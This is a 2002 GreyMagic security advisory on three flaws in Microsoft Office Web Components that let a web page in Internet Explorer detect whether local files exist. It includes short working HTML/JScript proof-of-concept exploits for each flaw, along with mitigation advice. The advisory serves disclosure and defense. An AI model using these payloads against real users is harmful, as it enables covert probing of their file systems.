GreyMagic Security Advisory GM#008-IE ===================================== By GreyMagic Software, Israel. 08 Apr 2002. Available in HTML format at http://security.greymagic.com/adv/gm008-ie/. Topic: Multiple local files detection issues with OWC in IE. Discovery date: 25 Feb 2002, 05 Mar 2002. Affected applications: ====================== * Office 2000 - Office Web Components 9, Chart component. * Office XP - Office Web Components 10, Chart component. * Office XP - Office Web Components 10, Spreadsheet component. * Office XP - Office Web Components 10, DataSourceControl component. Introduction: ============= Office Web Components (OWC) is a group of safe for scripting components used to enrich HTML documents with Spreadsheets, Charts, Pivot tables and more. OWC ships with the Microsoft Office package, but it is also downloadable as a separate (free for viewing only) component. Discussion: =========== There are several ways to check whether local files exist using OWC9 and OWC10. The first vulnerability is in the Chart component in both OWC9 and OWC10. The "Load" method does not perform any security check on the assigned URL and throws an error when given a file name that does not exist, otherwise the file exists. The second vulnerability is in the Spreadsheet component in OWC10. The "XMLURL" property blindly follows redirections, so it is possible to assign it a URL which redirects to a local file and determine whether it exists or not by the error thrown. It is also possible to read properly formatted WorkSheet XML files from disallowed locations in the same way. The third vulnerability is in the DataSourceControl component in OWC10. The "ConnectionFile" property does not perform any security checks on the assigned URL. Therefore, it is possible to assign a local file and determine whether it exists or not by the error thrown. Exploit: ======== A simple exploit for the first vulnerability: <object id="oCS" classid="clsid:0002E500-0000-0000-C000-000000000046" style="display:none"></object> <!-- For OWC10 the clsid is "0002E556-0000-0000-C000-000000000046" --> <script language="jscript"> onload=function () { try { oCS.Load("file://c:/test.txt"); alert("File exists!"); } catch (oErr) { alert("File does not exist."); } } </script> A simple exploit for the second vulnerability, "getFile.asp" internally redirects to "file://c:/test.txt": <object id="oSP" classid="clsid:0002E551-0000-0000-C000-000000000046" style="display:block"></object> <script language="jscript"> onload=function () { try { oSP.XMLURL="getFile.asp"; } catch (oErr) { alert(oErr.description.indexOf("valid path")==-1 ? "File exists!" : "File does not exist."); } } </script> A simple exploit for the third vulnerability: <object id="oDS" classid="clsid:0002E553-0000-0000-C000-000000000046" style="display:block"></object> <script language="jscript"> onload=function () { try { oDS.ConnectionFile="file://c:/test.txt"; } catch (oErr) { alert(oErr.number==-2146697211 ? "File does not exist." : "File exists!"); } } </script> Solution: ========= Set "Run ActiveX controls and plug-ins" to "Disable" or simply remove/disable OWC until a patch becomes available. Microsoft has been informed, they have opened an investigation regarding these issues. Tested on: ========== IE5sp2 NT4 sp6a + Office 2000 (OWC9), all patches. IE5.5sp2 NT4 sp6a + Office 2000 (OWC9), all patches. IE5.5sp2 NT4 sp6a + OWC10, all patches. IE6 Win2000 + Office 2000 (OWC9), all patches. IE6 WinXP + Office XP (OWC10), all patches. Demonstration: ============== A fully dynamic proof-of-concept demonstration of these issues is available at http://security.greymagic.com/adv/gm008-ie/. Feedback: ========= Please mail any questions or comments to securityat_private - Copyright © 2002 GreyMagic Software.
This archive was generated by hypermail 2b30 : Mon Apr 08 2002 - 17:19:03 PDT